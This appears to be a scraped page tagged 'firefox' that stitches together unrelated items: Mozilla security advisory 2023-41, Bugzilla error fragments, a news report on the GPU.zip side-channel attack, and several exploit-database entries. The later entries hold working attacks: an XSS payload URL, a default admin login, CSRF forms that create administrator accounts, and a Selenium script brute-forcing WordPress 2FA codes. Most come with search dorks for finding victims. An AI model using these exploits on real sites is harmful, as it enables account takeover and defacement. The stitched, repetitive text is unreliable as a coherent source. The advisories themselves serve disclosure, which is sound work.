Memory safety bugs present in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 118, Firefox ESR < 115.3, and Thunderbird < 115.3.

**Mozilla Foundation Security Advisory 2023-41**

Announced

September 26, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 118

**#CVE-2023-5168: Out-of-bounds write in FilterNodeD2D1**

Reporter

sonakkbi

Impact

high

**Description**

A compromised content process could have provided malicious data to FilterNodeD2D1 resulting in an out-of-bounds write, leading to a potentially exploitable crash in a privileged process.

**References**

*   Bug 1846683

**#CVE-2023-5169: Out-of-bounds write in PathOps**

Reporter

sonakkbi

Impact

high

**Description**

A compromised content process could have provided malicious data in a PathRecording resulting in an out-of-bounds write, leading to a potentially exploitable crash in a privileged process.

**References**

*   Bug 1846685

**#CVE-2023-5170: Memory leak from a privileged process**

Reporter

sonakkbi

Impact

high

**Description**

In canvas rendering, a compromised content process could have caused a surface to change unexpectedly, leading to a memory leak of a privileged process. This memory leak could be used to effect a sandbox escape if the correct data was leaked.

**References**

*   Bug 1846686

**#CVE-2023-5171: Use-after-free in Ion Compiler**

Reporter

Lukas Bernhard

Impact

high

**Description**

During Ion compilation, a Garbage Collection could have resulted in a use-after-free condition, allowing an attacker to write two NUL bytes, and cause a potentially exploitable crash.

**References**

*   Bug 1851599

**#CVE-2023-5172: Memory Corruption in Ion Hints**

Reporter

Mozilla Fuzzing Team

Impact

high

**Description**

A hashtable in the Ion Engine could have been mutated while there was a live interior reference, leading to a potential use-after-free and exploitable crash.

**References**

*   Bug 1852218

**#CVE-2023-5173: Out-of-bounds write in HTTP Alternate Services**

Reporter

Ronald Crane

Impact

moderate

**Description**

In a non-standard configuration of Firefox, an integer overflow could have occurred based on network traffic (possibly under influence of a local unprivileged webpage), leading to an out-of-bounds write to privileged process memory.  
_This bug only affects Firefox if a non-standard preference allowing non-HTTPS Alternate Services (network.http.altsvc.oe) is enabled._

**References**

*   Bug 1823172

**#CVE-2023-5174: Double-free in process spawning on Windows**

Reporter

Ronald Crane

Impact

moderate

**Description**

If Windows failed to duplicate a handle during process creation, the sandbox code may have inadvertently freed a pointer twice, resulting in a use-after-free and a potentially exploitable crash.  
_This bug only affects Firefox on Windows when run in non-standard configurations (such as using runas). Other operating systems are unaffected._

**References**

*   Bug 1848454

**#CVE-2023-5175: Use-after-free of ImageBitmap during process shutdown**

Reporter

Yangkang of 360 ATA Team

Impact

low

**Description**

During process shutdown, it was possible that an ImageBitmap was created that would later be used after being freed from a different codepath, leading to a potentially exploitable crash.

**References**

*   Bug 1849704

**#CVE-2023-5176: Memory safety bugs fixed in Firefox 118, Firefox ESR 115.3, and Thunderbird 115.3**

Reporter

Chris Peterson, Andrew McCreight, André Bargull, Nika Layzell and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 118, Firefox ESR 115.3, and Thunderbird 115.3

CVE-2023-5176: Security Vulnerabilities fixed in Firefox 118

During Ion compilation, a Garbage Collection could have resulted in a use-after-free condition, allowing an attacker to write two NUL bytes, and cause a potentially exploitable crash. This vulnerability affects Firefox < 118, Firefox ESR < 115.3, and Thunderbird < 115.3.

Sorry, I can't find "_1851599?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-5171: Invalid Bug ID

A compromised content process could have provided malicious data to `FilterNodeD2D1` resulting in an out-of-bounds write, leading to a potentially exploitable crash in a privileged process. This vulnerability affects Firefox < 118, Firefox ESR < 115.3, and Thunderbird < 115.3.

Sorry, I can't find "_1846683?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-5168: Invalid Bug ID

A novel side-channel attack called GPU.zip renders virtually all modern graphics processing units (GPU) vulnerable to information leakage.
"This channel exploits an optimization that is data dependent, software transparent, and present in nearly all modern GPUs: graphical data compression," a group of academics from the University of Texas at Austin, Carnegie Mellon University, University of

Vulnerability / Endpoint Security

A novel side-channel attack called **GPU.zip** renders virtually all modern graphics processing units (GPU) vulnerable to information leakage.

"This channel exploits an optimization that is data dependent, software transparent, and present in nearly all modern GPUs: graphical data compression," a group of academics from the University of Texas at Austin, Carnegie Mellon University, University of Washington, and the University of Illinois Urbana-Champaign said.

Graphical data compression is a feature in integrated GPUs (iGPUs) that allows for saving memory bandwidth and improving performance when rendering frames, compressing visual data losslessly even when it's not requested by software.

The study found that the compression, which happens in various vendor-specific and undocumented ways, induces data-dependent DRAM traffic and cache occupancy that can be measured using a side-channel.

"An attacker can exploit the iGPU-based compression channel to perform cross-origin pixel stealing attacks in the browser using SVG filters, even though SVG filters are implemented as constant time," the researchers said.

"The reason is that the attacker can create highly redundant or highly non-redundant patterns depending on a single secret pixel in the browser. As these patterns are processed by the iGPU, their varying degrees of redundancy cause the lossless compression output to depend on the secret pixel."

Successful exploitation could allow a malicious web page to infer the values of individual pixels from another web page embedded in an iframe element in the latest version of Google Chrome, effectively circumventing critical security boundaries such as same-origin policy (SOP).

Chrome and Microsoft Edge are particularly vulnerable to the attack because they allow cross-origin iframes to be loaded with cookies, permit rendering SVG filters on iframes, and delegate rendering tasks to the GPU. However, Mozilla Firefox and Apple Safari are not impacted.

In other words, the GPU graphical data compression leakage channel can be used to steal pixels from a cross-origin iframe by "either measuring the rendering time difference due to memory bus contention or by using the LLC walk time metric to infer the GPU-induced CPU cache state changes."

A proof-of-concept (PoC) devised by the researchers discovered that it's possible for a threat actor could trick a potential target into visiting a rogue website and learn information about a logged-in user's Wikipedia username.

UPCOMING WEBINAR

Fight AI with AI — Battling Cyber Threats with Next-Gen AI Tools

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

This, in turn, is rooted in the fact that some web standards allow for the framing page to apply visual effects (i.e., SVG filters) to the iframed page, thereby exposing the mechanism to side-channel attacks by, say, computing the time differences between rendering black and white pixels and then distinguish between them using the timing information.

Affected GPUs include those from AMD, Apple, Arm, Intel, Nvidia, and Qualcomm. That said, websites that already deny being embedded by cross-origin websites via X-Frame-Options and Content Security Policy (CSP) rules are not susceptible to the pixel-stealing attack.

The findings come on the back of a related side-channel attack called Hot Pixels that leverages a similar approach to conduct "browser-based pixel stealing and history sniffing attacks" against Chrome and Safari web browsers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover New GPU Side-Channel Vulnerability Leaking Sensitive Data

LogoBee CMS version 0.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : LogoBee CMS v0.2 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://logobee.com                                                                                                |  | # Dork      : intext:''Logo & Web Design by LogoBee''                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

LogoBee CMS 0.2 Cross Site Scripting

Lamano LMS version 0.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lamano LMS v0.1 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.lamano.lu/                                                                                              |  | # Dork      :  © 2018 Lamano by easysolutions                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] Use payload : user = admin & Pass : 1234[+] https://www.sylviebecker127.0.0.1luGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Lamano LMS 0.1 Insecure Settings

Luxcal Event Calendar version 3.2.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Luxcal Event Calendar v3.2.3 CSRF Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |  
| # Vendor    : https://www.LuxSoft.eu                                                                                             |  
| # Dork      : powered by LuxSoft                                                                                                 |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

[+] infected file : index.php

[+] http://127.0.0.1/q7.3/index.php.

[+] save code as poc.html .

<html>  
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">  
<input type="hidden" name="uname" value="tcyber"/>  
<input type="hidden" name="email" value="g4k@hot.mail"/>  
<input type="hidden" name="new_pw" value="123456"/>  
<input type="hidden" name="userRights" value="9"/>  
<input type='submit' name='addExe' value="Add Profile">  
</form>  
</html>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Luxcal Event Calendar 3.2.3 Cross Site Request Forgery

Lamano CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Lamano CMS v2.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : http://www.lamano.lu/                                                                                              |    
| # Dork      :  © 2018 Lamano by easysolutions                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply . 

[+] infected file : admin.php

[+] http://127.0.0.1/q73/admin.php .

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">

</tr>  
                    </table>  
                <br/><br/>  
        <form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST">  
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Nom d'utilisateur :</td>  
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Mot de passe : </td>  
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>  
                </tr>  
            </table>  
        </form><br/><br/>  
<div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Lamano CMS 2.0 Cross Site Request Forgery

WordPress Theme My Login 2FA plugin versions prior to 1.2 suffer from a brute forcing vulnerability.

    The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:from typing import KeysViewfrom selenium.webdriver.common.by import Byfrom selenium import webdriverfrom selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox()driver.get("websiteloginhere")# Locate the username field by its 'id' attribute and fill it in username_field = driver.find_element(By.ID, "user_login") username_field.click() username_field.send_keys("usernamehere")  # Locate the password field by its 'id' attribute and fill it in password_field = driver.find_element(By.ID, "user_pass") password_field.click() password_field.send_keys("passwordhere") # Locate the Log In button and click it login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") login_button.click() # FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting  for i in range(1000000):  code = str(i).zfill(6)   try:  wait = WebDriverWait(driver, 10)  code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']")))  except:  break   code_field.click()  code_field.clear()  code_field.send_keys(code)   verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")  verify_button.click()

WordPress Theme My Login 2FA Brute Force

An XPC misconfiguration vulnerability in CoreCode MacUpdater before 2.3.8, and 3.x before 3.1.2, allows attackers to escalate privileges by crafting malicious .pkg files.

Tag

#firefox